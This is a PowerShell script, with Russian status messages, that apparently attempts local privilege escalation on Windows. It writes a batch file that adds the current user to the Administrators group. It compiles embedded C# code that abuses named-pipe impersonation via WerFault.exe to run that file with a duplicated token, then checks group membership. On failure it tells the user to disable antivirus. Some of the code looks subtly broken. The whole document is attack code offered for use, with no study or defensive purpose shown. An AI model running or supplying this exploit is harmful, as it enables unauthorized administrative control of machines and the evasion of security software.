Загрузка данных


# up.ps1
$ErrorActionPreference = 'Stop'
$tmp = $env:TEMP
$bat = "$tmp\add.bat"
'@echo off
net localgroup Administrators %USERNAME% /add' | Out-File -Encoding ASCII $bat

$csc = (Get-ChildItem -Recurse -Filter 'csc.exe' -Path 'C:\Windows\Microsoft.NET\Framework64','C:\Windows\Microsoft.NET\Framework' | Select -First 1).FullName
if (!$csc) { Write-Host 'Нет .NET'; exit 1 }

$src = @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
class Exp {
    [DllImport("kernel32")] static extern IntPtr CreateNamedPipe(string n, uint o, uint p, uint m, uint ob, uint ib, uint t, IntPtr s);
    [DllImport("kernel32")] static extern bool ConnectNamedPipe(IntPtr h, IntPtr o);
    [DllImport("advapi32")] static extern bool ImpersonateNamedPipeClient(IntPtr h);
    [DllImport("advapi32")] static extern bool OpenThreadToken(IntPtr t, uint a, bool s, ref IntPtr tok);
    [DllImport("advapi32")] static extern bool DuplicateTokenEx(IntPtr t, uint a, IntPtr s, uint l, uint ty, ref IntPtr nt);
    [DllImport("advapi32")] static extern bool CreateProcessAsUser(IntPtr tok, string app, string cmd, IntPtr sa, IntPtr st, bool inh, uint f, IntPtr env, string d, ref STARTUPINFO si, out PROCESS_INFORMATION pi);
    struct STARTUPINFO { public int cb; public string reserved; public string desktop; public string title; public int x; public int y; public int cx; public int cy; public int flags; public int show; public int reserved2; public IntPtr stdIn; public IntPtr stdOut; public IntPtr stdErr; }
    struct PROCESS_INFORMATION { public IntPtr hProc; public IntPtr hThread; public int pid; public int tid; }
    static void Main() {
        IntPtr pipe = CreateNamedPipe(@"\\.\pipe\wer_pipe", 0x3, 0x0, 1, 512, 512, 0, IntPtr.Zero);
        if (pipe == (IntPtr)(-1)) return;
        Process.Start("cmd.exe", "/c start /min \"\" \"C:\\Windows\\System32\\WerFault.exe\" -u -p 9999 -s 0").WaitForExit(1000);
        ConnectNamedPipe(pipe, IntPtr.Zero);
        ImpersonateNamedPipeClient(pipe);
        IntPtr tok = IntPtr.Zero;
        OpenThreadToken(Process.GetCurrentProcess().Handle, 0xF01FF, false, ref tok);
        if (tok == IntPtr.Zero) return;
        IntPtr dupTok = IntPtr.Zero;
        DuplicateTokenEx(tok, 0xF01FF, IntPtr.Zero, 2, 1, ref dupTok);
        STARTUPINFO si = new STARTUPINFO(); si.cb = Marshal.SizeOf(si);
        PROCESS_INFORMATION pi;
        CreateProcessAsUser(dupTok, "cmd.exe", "/c \"" + Environment.GetEnvironmentVariable("TEMP") + "\\add.bat\"", IntPtr.Zero, IntPtr.Zero, false, 0, IntPtr.Zero, null, ref si, out pi);
    }
}
"@

$exe = "$tmp\exp.exe"
& $csc /target:exe /out:$exe /nowin32manifest /reference:System.dll $src
Start-Process -FilePath $exe -Wait
Start-Sleep 5

$grp = [ADSI]'WinNT://./Administrators,group'
$members = @($grp.Invoke('Members')) | % { ([ADSI]$_).InvokeGet('Name') }
if ($members -contains $env:USERNAME) { Write-Host "[+] Успех! Выйди и зайди заново." -ForegroundColor Green } 
else { Write-Host "[-] Не сработало. Попробуй отключить антивирус и выполнить снова." -ForegroundColor Red }